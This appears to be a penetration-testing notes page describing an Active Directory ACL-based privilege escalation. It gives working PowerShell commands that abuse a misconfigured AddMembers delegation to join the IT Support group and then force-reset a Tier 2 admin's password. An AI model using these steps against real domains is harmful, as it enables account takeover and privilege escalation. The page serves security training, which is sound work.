Skip to main content

Permission Delegation

If Possible The Target System Should Be Enumerated Using Bloodhound

Active Directory can delegate permissions and privileges through a feature called Permission Delegation.

For Example using Delegation, we can delegate the Permission to Force change a User's Password to the Help-Desk Team, meaning they now have a Delegated Privilege for this specific function.

Permission Delegation exploits are often referred to as ACL-Based Attacks. AD allows Administrators to configure Access Control Entries (ACE's) that populates Discretionary Access Control Lists (DACL's), hence the name ACL-Based Attacks. Almost any AD Object can be Secured with ACE's.


Privilege Escalation

Scenario

An Administrator has Misconfigured the Permission Delegation of the IT Support Group by providing the Domain Users Group with the AddMembers ACE.

This means that any member of the Domain Users Group (Including Our Account) can Add Accounts to the IT Support Group.

Furthermore, the IT Support Group has the ForceChangePassword ACE for the Tier 2 Admins Group Members.


AddMember

# The first step is to add our AD Account to the IT Support Group
Add-ADGroupMember "IT Support" -Members "AD-Username"
# If Everything Worked, we should see our Account as a Member
Get-ADGroupMember -Identity "IT Support"

ForceChangePassword

Now that we are a member of the IT Support Group, we have inherited the ForceChangePassword Permission Delegation over the Tier 2 Admins Group.

Now we need to Identify the Members of Tier 2 Admins Group and Select a Target. 

# List Possible Targets
Get-ADGroupMember -Identity "Tier 2 Admins"

# Setting New Password for the Target
$Password = ConvertTo-SecureString "New-Password" -AsPlainText -Force
Set-ADAccountPassword -Identity "AD-Username-Target" -Reset -NewPassword $Password
Access Denied Error

If we get the Error [Access Denied]. That means our Permissions have not yet propagated through the Domain.

We can either use the Command Below or wait for the Permissions to Update Automatically. The time of Update is Defined by System Policy.

:: Updates Group Policy Settings
gpupdate /force

:: [Detailed Information] Generate a Report
gpresult /H report.html